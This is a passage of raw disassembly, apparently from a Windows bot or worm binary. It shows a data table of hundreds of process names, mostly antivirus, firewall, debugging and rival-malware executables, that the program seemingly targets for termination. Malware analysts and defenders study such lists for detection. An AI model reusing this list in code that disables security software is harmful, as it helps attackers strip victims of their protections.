dd offset aEnt_exe ; "ENT.EXE"
dd offset aEsafe_exe ; "ESAFE.EXE"
dd offset aEscanh95_exe ; "ESCANH95.EXE"
dd offset aEscanhnt_exe ; "ESCANHNT.EXE"
dd offset aEscanv95_exe ; "ESCANV95.EXE"
dd offset aEspwatch_exe ; "ESPWATCH.EXE"
dd offset aEthereal_exe ; "ETHEREAL.EXE"
dd offset aEtrustcipe_exe ; "ETRUSTCIPE.EXE"
dd offset aEvpn_exe ; "EVPN.EXE"
dd offset aExantivirusCne ; "EXANTIVIRUS-CNET.EXE"
dd offset aExe_avxw_exe ; "EXE.AVXW.EXE"
dd offset aExpert_exe ; "EXPERT.EXE"
dd offset aExplore_exe ; "EXPLORE.EXE"
dd offset aFAgnt95_exe ; "F-AGNT95.EXE"
dd offset aFProt_exe ; "F-PROT.EXE"
dd offset aFProt95_exe ; "F-PROT95.EXE"
dd offset aFStopw_exe ; "F-STOPW.EXE"
dd offset aFameh32_exe ; "FAMEH32.EXE"
dd offset aFast_exe ; "FAST.EXE"
dd offset aFch32_exe ; "FCH32.EXE"
dd offset aFih32_exe ; "FIH32.EXE"
dd offset aFindviru_exe ; "FINDVIRU.EXE"
dd offset aFirewall_exe ; "FIREWALL.EXE"
dd offset aFlowprotector_ ; "FLOWPROTECTOR.EXE"
dd offset aFnrb32_exe ; "FNRB32.EXE"
dd offset aFpWin_exe ; "FP-WIN.EXE"
dd offset aFpWin_trial_ex ; "FP-WIN_TRIAL.EXE"
dd offset aFprot_exe ; "FPROT.EXE"
dd offset aFrw_exe ; "FRW.EXE"
dd offset aFsaa_exe ; "FSAA.EXE"
dd offset aFsav_exe ; "FSAV.EXE"
dd offset aFsav32_exe ; "FSAV32.EXE"
dd offset aFsav530stbyb_e ; "FSAV530STBYB.EXE"
dd offset aFsav530wtbyb_e ; "FSAV530WTBYB.EXE"
dd offset aFsav95_exe ; "FSAV95.EXE"
dd offset aFsgk32_exe ; "FSGK32.EXE"
dd offset aFsm32_exe ; "FSM32.EXE"
dd offset aFsma32_exe ; "FSMA32.EXE"
dd offset aFsmb32_exe ; "FSMB32.EXE"
dd offset aGator_exe ; "GATOR.EXE"
dd offset aGbmenu_exe ; "GBMENU.EXE"
dd offset aGbpoll_exe ; "GBPOLL.EXE"
dd offset aGenerics_exe ; "GENERICS.EXE"
dd offset aGmt_exe ; "GMT.EXE"
dd offset aGuard_exe ; "GUARD.EXE"
dd offset aGuarddog_exe ; "GUARDDOG.EXE"
dd offset aHacktracersetu ; "HACKTRACERSETUP.EXE"
dd offset aHbinst_exe ; "HBINST.EXE"
dd offset aHbsrv_exe ; "HBSRV.EXE"
dd offset aHotactio_exe ; "HOTACTIO.EXE"
dd offset aHotpatch_exe ; "HOTPATCH.EXE"
dd offset aHtlog_exe ; "HTLOG.EXE"
dd offset aHtpatch_exe ; "HTPATCH.EXE"
dd offset aHwpe_exe ; "HWPE.EXE"
dd offset aHxdl_exe ; "HXDL.EXE"
dd offset aHxiul_exe ; "HXIUL.EXE"
dd offset aIamapp_exe ; "IAMAPP.EXE"
dd offset aIamserv_exe ; "IAMSERV.EXE"
dd offset aIamstats_exe ; "IAMSTATS.EXE"
dd offset aIbmasn_exe ; "IBMASN.EXE"
dd offset aIbmavsp_exe ; "IBMAVSP.EXE"
dd offset aIcload95_exe ; "ICLOAD95.EXE"
dd offset aIcloadnt_exe ; "ICLOADNT.EXE"
dd offset aIcmon_exe ; "ICMON.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsupp95_exe ; "ICSUPP95.EXE"
dd offset aIcsuppnt_exe ; "ICSUPPNT.EXE"
dd offset aIdle_exe ; "IDLE.EXE"
dd offset aIedll_exe ; "IEDLL.EXE"
dd offset aIedriver_exe ; "IEDRIVER.EXE"
dd offset aIexplorer_exe ; "IEXPLORER.EXE"
dd offset aIface_exe ; "IFACE.EXE"
dd offset aIfw2000_exe ; "IFW2000.EXE"
dd offset aInetlnfo_exe ; "INETLNFO.EXE"
dd offset aInfus_exe ; "INFUS.EXE"
dd offset aInfwin_exe ; "INFWIN.EXE"
dd offset aInit_exe ; "INIT.EXE"
dd offset aIntdel_exe ; "INTDEL.EXE"
dd offset aIntren_exe ; "INTREN.EXE"
dd offset aIomon98_exe ; "IOMON98.EXE"
dd offset aIparmor_exe ; "IPARMOR.EXE"
dd offset aIris_exe ; "IRIS.EXE"
dd offset aIsass_exe ; "ISASS.EXE"
dd offset aIsrv95_exe ; "ISRV95.EXE"
dd offset aIstsvc_exe ; "ISTSVC.EXE"
dd offset aJammer_exe ; "JAMMER.EXE"
dd offset aJdbgmrg_exe ; "JDBGMRG.EXE"
dd offset aJedi_exe ; "JEDI.EXE"
dd offset aKavlite40eng_e ; "KAVLITE40ENG.EXE"
dd offset aKavpers40eng_e ; "KAVPERS40ENG.EXE"
dd offset aKavpf_exe ; "KAVPF.EXE"
dd offset aKazza_exe ; "KAZZA.EXE"
dd offset aKeenvalue_exe ; "KEENVALUE.EXE"
dd offset aKerioPf213EnWi ; "KERIO-PF-213-EN-WIN.EXE"
dd offset aKerioWrl421EnW ; "KERIO-WRL-421-EN-WIN.EXE"
dd offset aKerioWrp421EnW ; "KERIO-WRP-421-EN-WIN.EXE"
dd offset aKernel32_exe ; "KERNEL32.EXE"
dd offset aKillprocessset ; "KILLPROCESSSETUP161.EXE"
dd offset aLauncher_exe ; "LAUNCHER.EXE"
dd offset aLdnetmon_exe ; "LDNETMON.EXE"
dd offset aLdpro_exe ; "LDPRO.EXE"
dd offset aLdpromenu_exe ; "LDPROMENU.EXE"
dd offset aLdscan_exe ; "LDSCAN.EXE"
dd offset aLnetinfo_exe ; "LNETINFO.EXE"
dd offset aLoader_exe ; "LOADER.EXE"
dd offset aLocalnet_exe ; "LOCALNET.EXE"
dd offset aLockdown_exe ; "LOCKDOWN.EXE"
dd offset aLockdown2000_e ; "LOCKDOWN2000.EXE"
dd offset aLookout_exe ; "LOOKOUT.EXE"
dd offset aLordpe_exe ; "LORDPE.EXE"
dd offset aLsetup_exe ; "LSETUP.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuall_exe ; "LUALL.EXE"
dd offset aLuau_exe ; "LUAU.EXE"
dd offset aLucomserver_ex ; "LUCOMSERVER.EXE"
dd offset aLuinit_exe ; "LUINIT.EXE"
dd offset aLuspt_exe ; "LUSPT.EXE"
dd offset aMapisvc32_exe ; "MAPISVC32.EXE"
dd offset aMcagent_exe ; "MCAGENT.EXE"
dd offset aMcmnhdlr_exe ; "MCMNHDLR.EXE"
dd offset aMcshield_exe ; "MCSHIELD.EXE"
dd offset aMctool_exe ; "MCTOOL.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcupdate_exe ; "MCUPDATE.EXE"
dd offset aMcvsrte_exe ; "MCVSRTE.EXE"
dd offset aMcvsshld_exe ; "MCVSSHLD.EXE"
dd offset aMd_exe ; "MD.EXE"
dd offset aMfin32_exe ; "MFIN32.EXE"
dd offset aMfw2en_exe ; "MFW2EN.EXE"
dd offset aMfweng3_02d30_ ; "MFWENG3.02D30.EXE"
dd offset aMgavrtcl_exe ; "MGAVRTCL.EXE"
dd offset aMgavrte_exe ; "MGAVRTE.EXE"
dd offset aMghtml_exe ; "MGHTML.EXE"
dd offset aMgui_exe ; "MGUI.EXE"
dd offset aMinilog_exe ; "MINILOG.EXE"
dd offset aMmod_exe ; "MMOD.EXE"
dd offset aMonitor_exe ; "MONITOR.EXE"
dd offset aMoolive_exe ; "MOOLIVE.EXE"
dd offset aMostat_exe ; "MOSTAT.EXE"
dd offset aMpfagent_exe ; "MPFAGENT.EXE"
dd offset aMpfservice_exe ; "MPFSERVICE.EXE"
dd offset aMpftray_exe ; "MPFTRAY.EXE"
dd offset aMrflux_exe ; "MRFLUX.EXE"
dd offset aMsapp_exe ; "MSAPP.EXE"
dd offset aMsbb_exe ; "MSBB.EXE"
dd offset aMsblast_exe ; "MSBLAST.EXE"
dd offset aMscache_exe ; "MSCACHE.EXE"
dd offset aMsccn32_exe ; "MSCCN32.EXE"
dd offset aMscman_exe ; "MSCMAN.EXE"
dd offset aMsconfig_exe ; "MSCONFIG.EXE"
dd offset aMsdm_exe ; "MSDM.EXE"
dd offset aMsdos_exe ; "MSDOS.EXE"
dd offset aMsiexec16_exe ; "MSIEXEC16.EXE"
dd offset aMsinfo32_exe ; "MSINFO32.EXE"
dd offset aMslaugh_exe ; "MSLAUGH.EXE"
dd offset aMsmgt_exe ; "MSMGT.EXE"
dd offset aMsmsgri32_exe ; "MSMSGRI32.EXE"
dd offset aMssmmc32_exe ; "MSSMMC32.EXE"
dd offset aMssys_exe ; "MSSYS.EXE"
dd offset aMsvxd_exe ; "MSVXD.EXE"
dd offset aMu0311ad_exe ; "MU0311AD.EXE"
dd offset aMwatch_exe ; "MWATCH.EXE"
dd offset aN32scanw_exe ; "N32SCANW.EXE"
dd offset aNav_exe ; "NAV.EXE"
dd offset aAutoProtect_na ; "AUTO-PROTECT.NAV80TRY.EXE"
dd offset aNavap_navapsvc ; "NAVAP.NAVAPSVC.EXE"
dd offset aNavapsvc_exe ; "NAVAPSVC.EXE"
dd offset aNavapw32_exe ; "NAVAPW32.EXE"
dd offset aNavdx_exe ; "NAVDX.EXE"
dd offset aNavengnavex15_ ; "NAVENGNAVEX15.NAVLU32.EXE"
dd offset aNavlu32_exe ; "NAVLU32.EXE"
dd offset aNavnt_exe ; "NAVNT.EXE"
dd offset aNavstub_exe ; "NAVSTUB.EXE"
dd offset aNavw32_exe ; "NAVW32.EXE"
dd offset aNavwnt_exe ; "NAVWNT.EXE"
dd offset aNc2000_exe ; "NC2000.EXE"
dd offset aNcinst4_exe ; "NCINST4.EXE"
dd offset aNdd32_exe ; "NDD32.EXE"
dd offset aNeomonitor_exe ; "NEOMONITOR.EXE"
dd offset aNeowatchlog_ex ; "NEOWATCHLOG.EXE"
dd offset aNetarmor_exe ; "NETARMOR.EXE"
dd offset aNetd32_exe ; "NETD32.EXE"
dd offset aNetinfo_exe ; "NETINFO.EXE"
dd offset aNetmon_exe ; "NETMON.EXE"
dd offset aNetscanpro_exe ; "NETSCANPRO.EXE"
dd offset aNetspyhunter1_ ; "NETSPYHUNTER-1.2.EXE"
dd offset aNetstat_exe ; "NETSTAT.EXE"
dd offset aNetutils_exe ; "NETUTILS.EXE"
dd offset aNisserv_exe ; "NISSERV.EXE"
dd offset aNisum_exe ; "NISUM.EXE"
dd offset aNmain_exe ; "NMAIN.EXE"
dd offset aNod32_exe ; "NOD32.EXE"
dd offset aNormist_exe ; "NORMIST.EXE"
dd offset aNorton_interne ; "NORTON_INTERNET_SECU_3.0_407.EXE"
dd offset aNotstart_exe ; "NOTSTART.EXE"
dd offset aNpf40_tw_98_nt ; "NPF40_TW_98_NT_ME_2K.EXE"
dd offset aNpfmessenger_e ; "NPFMESSENGER.EXE"
dd offset aNprotect_exe ; "NPROTECT.EXE"
dd offset aNpscheck_exe ; "NPSCHECK.EXE"
dd offset aNpssvc_exe ; "NPSSVC.EXE"
dd offset aNsched32_exe ; "NSCHED32.EXE"
dd offset aNssys32_exe ; "NSSYS32.EXE"
dd offset aNstask32_exe ; "NSTASK32.EXE"
dd offset aNsupdate_exe ; "NSUPDATE.EXE"
dd offset aNt_exe ; "NT.EXE"
dd offset aNtrtscan_exe ; "NTRTSCAN.EXE"
dd offset aNtvdm_exe ; "NTVDM.EXE"
dd offset aNtxconfig_exe ; "NTXconfig.EXE"
dd offset aNui_exe ; "NUI.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNupgrade_exe ; "NUPGRADE.EXE"
dd offset aNvarch16_exe ; "NVARCH16.EXE"
dd offset aNvc95_exe ; "NVC95.EXE"
dd offset aNvsvc32_exe ; "NVSVC32.EXE"
dd offset aNwinst4_exe ; "NWINST4.EXE"
dd offset aNwservice_exe ; "NWSERVICE.EXE"
dd offset aNwtool16_exe ; "NWTOOL16.EXE"
dd offset aOllydbg_exe ; "OLLYDBG.EXE"
dd offset aOnsrvr_exe ; "ONSRVR.EXE"
dd offset aOptimize_exe ; "OPTIMIZE.EXE"
dd offset aOstronet_exe ; "OSTRONET.EXE"
dd offset aOtfix_exe ; "OTFIX.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpost_exe ; "OUTPOST.EXE"
dd offset aOutpostinstall ; "OUTPOSTINSTALL.EXE"
dd offset aOutpostproinst ; "OUTPOSTPROINSTALL.EXE"
dd offset aPadmin_exe ; "PADMIN.EXE"
dd offset aPanixk_exe ; "PANIXK.EXE"
dd offset aPatch_exe ; "PATCH.EXE"
dd offset aPavcl_exe ; "PAVCL.EXE"
dd offset aPavproxy_exe ; "PAVPROXY.EXE"
dd offset aPavsched_exe ; "PAVSCHED.EXE"
dd offset aPavw_exe ; "PAVW.EXE"
dd offset aPcc2002s902_ex ; "PCC2002S902.EXE"
dd offset aPcc2k_76_1436_ ; "PCC2K_76_1436.EXE"
dd offset aPcciomon_exe ; "PCCIOMON.EXE"
dd offset aPccntmon_exe ; "PCCNTMON.EXE"
dd offset aPccwin97_exe ; "PCCWIN97.EXE"
dd offset aPccwin98_exe ; "PCCWIN98.EXE"
dd offset aPcdsetup_exe ; "PCDSETUP.EXE"
dd offset aPcfwallicon_ex ; "PCFWALLICON.EXE"
dd offset aPcip10117_0_ex ; "PCIP10117_0.EXE"
dd offset aPcscan_exe ; "PCSCAN.EXE"
dd offset aPdsetup_exe ; "PDSETUP.EXE"
dd offset aPenis_exe ; "PENIS.EXE"
dd offset aPeriscope_exe ; "PERISCOPE.EXE"
dd offset aPersfw_exe ; "PERSFW.EXE"
dd offset aPerswf_exe ; "PERSWF.EXE"
dd offset aPf2_exe ; "PF2.EXE"
dd offset aPfwadmin_exe ; "PFWADMIN.EXE"
dd offset aPgmonitr_exe ; "PGMONITR.EXE"
dd offset aPingscan_exe ; "PINGSCAN.EXE"
dd offset aPlatin_exe ; "PLATIN.EXE"
dd offset aPop3trap_exe ; "POP3TRAP.EXE"
dd offset aPoproxy_exe ; "POPROXY.EXE"
dd offset aPopscan_exe ; "POPSCAN.EXE"
dd offset aPortdetective_ ; "PORTDETECTIVE.EXE"
dd offset aPortmonitor_ex ; "PORTMONITOR.EXE"
dd offset aPowerscan_exe ; "POWERSCAN.EXE"
dd offset aPpinupdt_exe ; "PPINUPDT.EXE"
dd offset aPptbc_exe ; "PPTBC.EXE"
dd offset aPpvstop_exe ; "PPVSTOP.EXE"
dd offset aPrizesurfer_ex ; "PRIZESURFER.EXE"
dd offset aPrmt_exe ; "PRMT.EXE"
dd offset aPrmvr_exe ; "PRMVR.EXE"
dd offset aProcdump_exe ; "PROCDUMP.EXE"
dd offset aProcessmonitor ; "PROCESSMONITOR.EXE"
dd offset aProcexplorerv1 ; "PROCEXPLORERV1.0.EXE"
dd offset aProgramauditor ; "PROGRAMAUDITOR.EXE"
dd offset aProport_exe ; "PROPORT.EXE"
dd offset aProtectx_exe ; "PROTECTX.EXE"
dd offset aPspf_exe ; "PSPF.EXE"
dd offset aPurge_exe ; "PURGE.EXE"
dd offset aPussy_exe ; "PUSSY.EXE"
dd offset aPview95_exe ; "PVIEW95.EXE"
dd offset aQconsole_exe ; "QCONSOLE.EXE"
dd offset aQserver_exe ; "QSERVER.EXE"
dd offset aRapapp_exe ; "RAPAPP.EXE"
dd offset aRav7_exe ; "RAV7.EXE"
dd offset aRav7win_exe ; "RAV7WIN.EXE"
dd offset aRav8win32eng_e ; "RAV8WIN32ENG.EXE"
dd offset aRay_exe ; "RAY.EXE"
dd offset aRb32_exe ; "RB32.EXE"
dd offset aRcsync_exe ; "RCSYNC.EXE"
dd offset aRealmon_exe ; "REALMON.EXE"
dd offset aReged_exe ; "REGED.EXE"
dd offset aRegedit_exe ; "REGEDIT.EXE"
dd offset aRegedt32_exe ; "REGEDT32.EXE"
dd offset aRescue_exe ; "RESCUE.EXE"
dd offset aRescue32_exe ; "RESCUE32.EXE"
dd offset aRrguard_exe ; "RRGUARD.EXE"
dd offset aRshell_exe ; "RSHELL.EXE"
dd offset aRtvscan_exe ; "RTVSCAN.EXE"
dd offset aRtvscn95_exe ; "RTVSCN95.EXE"
dd offset aRulaunch_exe ; "RULAUNCH.EXE"
dd offset aRun32dll_exe ; "RUN32DLL.EXE"
dd offset aRundll_exe ; "RUNDLL.EXE"
dd offset aRundll16_exe ; "RUNDLL16.EXE"
dd offset aRuxdll32_exe ; "RUXDLL32.EXE"
dd offset aSafeweb_exe ; "SAFEWEB.EXE"
dd offset aSahagent_exe ; "SAHAGENT.EXE"
dd offset aSave_exe ; "SAVE.EXE"
dd offset aSavenow_exe ; "SAVENOW.EXE"
dd offset aSbserv_exe ; "SBSERV.EXE"
dd offset aSc_exe ; "SC.EXE"
dd offset aScam32_exe ; "SCAM32.EXE"
dd offset aScan32_exe ; "SCAN32.EXE"
dd offset aScan95_exe ; "SCAN95.EXE"
dd offset aScanpm_exe ; "SCANPM.EXE"
dd offset aScrscan_exe ; "SCRSCAN.EXE"
dd offset aScrsvr_exe ; "SCRSVR.EXE"
dd offset aScvhost_exe ; "SCVHOST.EXE"
dd offset aSd_exe ; "SD.EXE"
dd offset aServ95_exe ; "SERV95.EXE"
dd offset aService_exe ; "SERVICE.EXE"
dd offset aServlce_exe ; "SERVLCE.EXE"
dd offset aServlces_exe ; "SERVLCES.EXE"
dd offset aSetupvameeval_ ; "SETUPVAMEEVAL.EXE"
dd offset aSetup_flowprot ; "SETUP_FLOWPROTECTOR_US.EXE"
dd offset aSfc_exe ; "SFC.EXE"
dd offset aSgssfw32_exe ; "SGSSFW32.EXE"
dd offset aSh_exe ; "SH.EXE"
dd offset aShellspyinstal ; "SHELLSPYINSTALL.EXE"
dd offset aShn_exe ; "SHN.EXE"
dd offset aShowbehind_exe ; "SHOWBEHIND.EXE"
dd offset aSmc_exe ; "SMC.EXE"
dd offset aSms_exe ; "SMS.EXE"
dd offset aSmss32_exe ; "SMSS32.EXE"
dd offset aSoap_exe ; "SOAP.EXE"
dd offset aSofi_exe ; "SOFI.EXE"
dd offset aSperm_exe ; "SPERM.EXE"
dd offset aSpf_exe ; "SPF.EXE"
dd offset aSphinx_exe ; "SPHINX.EXE"
dd offset aSpoler_exe ; "SPOLER.EXE"
dd offset aSpoolcv_exe ; "SPOOLCV.EXE"
dd offset aSpoolsv32_exe ; "SPOOLSV32.EXE"
dd offset aSpyxx_exe ; "SPYXX.EXE"
dd offset aSrexe_exe ; "SREXE.EXE"
dd offset aSrng_exe ; "SRNG.EXE"
dd offset aSs3edit_exe ; "SS3EDIT.EXE"
dd offset aSsgrate_exe ; "SSGRATE.EXE"
dd offset aSsg_4104_exe ; "SSG_4104.EXE"
dd offset aSt2_exe ; "ST2.EXE"
dd offset aStart_exe ; "START.EXE"
dd offset aStcloader_exe ; "STCLOADER.EXE"
dd offset aSupftrl_exe ; "SUPFTRL.EXE"
dd offset aSupport_exe ; "SUPPORT.EXE"
dd offset aSupporter5_exe ; "SUPPORTER5.EXE"
dd offset aSvc_exe ; "SVC.EXE"
dd offset aSvchostc_exe ; "SVCHOSTC.EXE"
dd offset aSvchosts_exe ; "SVCHOSTS.EXE"
dd offset aSvshost_exe ; "SVSHOST.EXE"
dd offset aSweep95_exe ; "SWEEP95.EXE"
dd offset aSweepnet_sweep ; "SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE"
dd offset aSymproxysvc_ex ; "SYMPROXYSVC.EXE"
dd offset aSymtray_exe ; "SYMTRAY.EXE"
dd offset aSysedit_exe ; "SYSEDIT.EXE"
dd offset aSystem_exe ; "SYSTEM.EXE"
dd offset aSystem32_exe ; "SYSTEM32.EXE"
dd offset aSysupd_exe ; "SYSUPD.EXE"
dd offset aTaskmg_exe ; "TASKMG.EXE"
dd offset aTaskmo_exe ; "TASKMO.EXE"
dd offset aTaskmon_exe ; "TASKMON.EXE"
dd offset aTaumon_exe ; "TAUMON.EXE"
dd offset aTbscan_exe ; "TBSCAN.EXE"
dd offset aTc_exe ; "TC.EXE"
dd offset aTca_exe ; "TCA.EXE"
dd offset aTcm_exe ; "TCM.EXE"
dd offset aTds3_exe ; "TDS-3.EXE"
dd offset aTds298_exe ; "TDS2-98.EXE"
dd offset aTds2Nt_exe ; "TDS2-NT.EXE"
dd offset aTeekids_exe ; "TEEKIDS.EXE"
dd offset aTfak_exe ; "TFAK.EXE"
dd offset aTfak5_exe ; "TFAK5.EXE"
dd offset aTgbob_exe ; "TGBOB.EXE"
dd offset aTitanin_exe ; "TITANIN.EXE"
dd offset aTitaninxp_exe ; "TITANINXP.EXE"
dd offset aTracert_exe ; "TRACERT.EXE"
dd offset aTrickler_exe ; "TRICKLER.EXE"
dd offset aTrjscan_exe ; "TRJSCAN.EXE"
dd offset aTrjsetup_exe ; "TRJSETUP.EXE"
dd offset aTrojantrap3_ex ; "TROJANTRAP3.EXE"
dd offset aTsadbot_exe ; "TSADBOT.EXE"
dd offset aTvmd_exe ; "TVMD.EXE"
dd offset aTvtmd_exe ; "TVTMD.EXE"
dd offset aUndoboot_exe ; "UNDOBOOT.EXE"
dd offset aUpdat_exe ; "UPDAT.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpdate_exe ; "UPDATE.EXE"
dd offset aUpgrad_exe ; "UPGRAD.EXE"
dd offset aUtpost_exe ; "UTPOST.EXE"
dd offset aVbcmserv_exe ; "VBCMSERV.EXE"
dd offset aVbcons_exe ; "VBCONS.EXE"
dd offset aVbust_exe ; "VBUST.EXE"
dd offset aVbwin9x_exe ; "VBWIN9X.EXE"
dd offset aVbwinntw_exe ; "VBWINNTW.EXE"
dd offset aVcsetup_exe ; "VCSETUP.EXE"
dd offset aVet32_exe ; "VET32.EXE"
dd offset aVet95_exe ; "VET95.EXE"
dd offset aVettray_exe ; "VETTRAY.EXE"
dd offset aVfsetup_exe ; "VFSETUP.EXE"
dd offset aVirHelp_exe ; "VIR-HELP.EXE"
dd offset aVirusmdpersona ; "VIRUSMDPERSONALFIREWALL.EXE"
dd offset aVnlan300_exe ; "VNLAN300.EXE"
dd offset aVnpc3000_exe ; "VNPC3000.EXE"
dd offset aVpc32_exe ; "VPC32.EXE"
dd offset aVpc42_exe ; "VPC42.EXE"
dd offset aVpfw30s_exe ; "VPFW30S.EXE"
dd offset aVptray_exe ; "VPTRAY.EXE"
dd offset aVscan40_exe ; "VSCAN40.EXE"
dd offset aVscenu6_02d30_ ; "VSCENU6.02D30.EXE"
dd offset aVsched_exe ; "VSCHED.EXE"
dd offset aVsecomr_exe ; "VSECOMR.EXE"
dd offset aVshwin32_exe ; "VSHWIN32.EXE"
dd offset aVsisetup_exe ; "VSISETUP.EXE"
dd offset aVsmain_exe ; "VSMAIN.EXE"
dd offset aVsmon_exe ; "VSMON.EXE"
dd offset aVsstat_exe ; "VSSTAT.EXE"
dd offset aVswin9xe_exe ; "VSWIN9XE.EXE"
dd offset aVswinntse_exe ; "VSWINNTSE.EXE"
dd offset aVswinperse_exe ; "VSWINPERSE.EXE"
dd offset aW32dsm89_exe ; "W32DSM89.EXE"
dd offset aW9x_exe ; "W9X.EXE"
dd offset aWatchdog_exe ; "WATCHDOG.EXE"
dd offset aWebdav_exe ; "WEBDAV.EXE"
dd offset aWebscanx_exe ; "WEBSCANX.EXE"
dd offset aWebtrap_exe ; "WEBTRAP.EXE"
dd offset aWfindv32_exe ; "WFINDV32.EXE"
dd offset aWgfe95_exe ; "WGFE95.EXE"
dd offset aWhoswatchingme ; "WHOSWATCHINGME.EXE"
dd offset aWimmun32_exe ; "WIMMUN32.EXE"
dd offset aWinBugsfix_exe ; "WIN-BUGSFIX.EXE"
dd offset aWin32_exe ; "WIN32.EXE"
dd offset aWin32us_exe ; "WIN32US.EXE"
dd offset aWinactive_exe ; "WINACTIVE.EXE"
dd offset aWindow_exe ; "WINDOW.EXE"
dd offset aWindows_exe ; "WINDOWS.EXE"
dd offset aWininetd_exe ; "WININETD.EXE"
dd offset aWininit_exe ; "WININIT.EXE"
dd offset aWininitx_exe ; "WININITX.EXE"
dd offset aWinlogin_exe ; "WINLOGIN.EXE"
dd offset aWinmain_exe ; "WINMAIN.EXE"
dd offset aWinnet_exe ; "WINNET.EXE"
dd offset aWinppr32_exe ; "WINPPR32.EXE"
dd offset aWinrecon_exe ; "WINRECON.EXE"
dd offset aWinservn_exe ; "WINSERVN.EXE"
dd offset aWinssk32_exe ; "WINSSK32.EXE"
dd offset aWinstart_exe ; "WINSTART.EXE"
dd offset aWinstart001_ex ; "WINSTART001.EXE"
dd offset aWintsk32_exe ; "WINTSK32.EXE"
dd offset aWinupdate_exe ; "WINUPDATE.EXE"
dd offset aWkufind_exe ; "WKUFIND.EXE"
dd offset aWnad_exe ; "WNAD.EXE"
dd offset aWnt_exe ; "WNT.EXE"
dd offset aWradmin_exe ; "WRADMIN.EXE"
dd offset aWrctrl_exe ; "WRCTRL.EXE"
dd offset aWsbgate_exe ; "WSBGATE.EXE"
dd offset aWupdater_exe ; "WUPDATER.EXE"
dd offset aWupdt_exe ; "WUPDT.EXE"
dd offset aWyvernworksfir ; "WYVERNWORKSFIREWALL.EXE"
dd offset aXpf202en_exe ; "XPF202EN.EXE"
dd offset aZapro_exe ; "ZAPRO.EXE"
dd offset aZapsetup3001_e ; "ZAPSETUP3001.EXE"
dd offset aZatutor_exe ; "ZATUTOR.EXE"
dd offset aZonalm2601_exe ; "ZONALM2601.EXE"
dd offset aZonealarm_exe ; "ZONEALARM.EXE"
dd offset a_avp32_exe ; "_AVP32.EXE"
dd offset a_avpcc_exe ; "_AVPCC.EXE"
dd offset a_avpm_exe ; "_AVPM.EXE"
dd offset aHijackthis_exe ; "HIJACKTHIS.EXE"
dd offset aFAgobot_exe ; "F-AGOBOT.EXE"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
dword_43210C dd 7Dh dup(0) ; DATA XREF: sub_411876+EC�o
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: .data:00432108�o
align 10h
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:00432104�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:00432100�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:004320FC�o
align 4
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:004320F8�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:004320F4�o
align 10h
dd 0
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:004320F0�o
align 10h
dd 0
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:004320EC�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:004320E8�o
dd 0
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:004320E4�o
dd 0
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:004320E0�o
dd 0
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:004320DC�o
dd 0
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:004320D8�o
align 4
dd 0
aFAgobot_exe db 'F-AGOBOT.EXE',0 ; DATA XREF: .data:004320D4�o
align 4
aHijackthis_exe db 'HIJACKTHIS.EXE',0 ; DATA XREF: .data:004320D0�o
align 10h
a_avpm_exe db '_AVPM.EXE',0 ; DATA XREF: .data:004320CC�o
align 4
a_avpcc_exe db '_AVPCC.EXE',0 ; DATA XREF: .data:004320C8�o
align 4
dd 0
a_avp32_exe db '_AVP32.EXE',0 ; DATA XREF: .data:004320C4�o
align 4
dd 0
aZonealarm_exe db 'ZONEALARM.EXE',0 ; DATA XREF: .data:004320C0�o
align 4
aZonalm2601_exe db 'ZONALM2601.EXE',0 ; DATA XREF: .data:004320BC�o
align 10h
aZatutor_exe db 'ZATUTOR.EXE',0 ; DATA XREF: .data:004320B8�o
align 10h
aZapsetup3001_e db 'ZAPSETUP3001.EXE',0 ; DATA XREF: .data:004320B4�o
align 4
aZapro_exe db 'ZAPRO.EXE',0 ; DATA XREF: .data:004320B0�o
align 10h
aXpf202en_exe db 'XPF202EN.EXE',0 ; DATA XREF: .data:004320AC�o
align 10h
aWyvernworksfir db 'WYVERNWORKSFIREWALL.EXE',0 ; DATA XREF: .data:004320A8�o
dd 0
aWupdt_exe db 'WUPDT.EXE',0 ; DATA XREF: .data:004320A4�o
align 4
aWupdater_exe db 'WUPDATER.EXE',0 ; DATA XREF: .data:004320A0�o
align 4
aWsbgate_exe db 'WSBGATE.EXE',0 ; DATA XREF: .data:0043209C�o
align 8
aWrctrl_exe db 'WRCTRL.EXE',0 ; DATA XREF: .data:00432098�o
align 8
aWradmin_exe db 'WRADMIN.EXE',0 ; DATA XREF: .data:00432094�o
align 8
aWnt_exe db 'WNT.EXE',0 ; DATA XREF: .data:00432090�o
dd 0
aWnad_exe db 'WNAD.EXE',0 ; DATA XREF: .data:0043208C�o
align 10h
aWkufind_exe db 'WKUFIND.EXE',0 ; DATA XREF: .data:00432088�o
align 10h
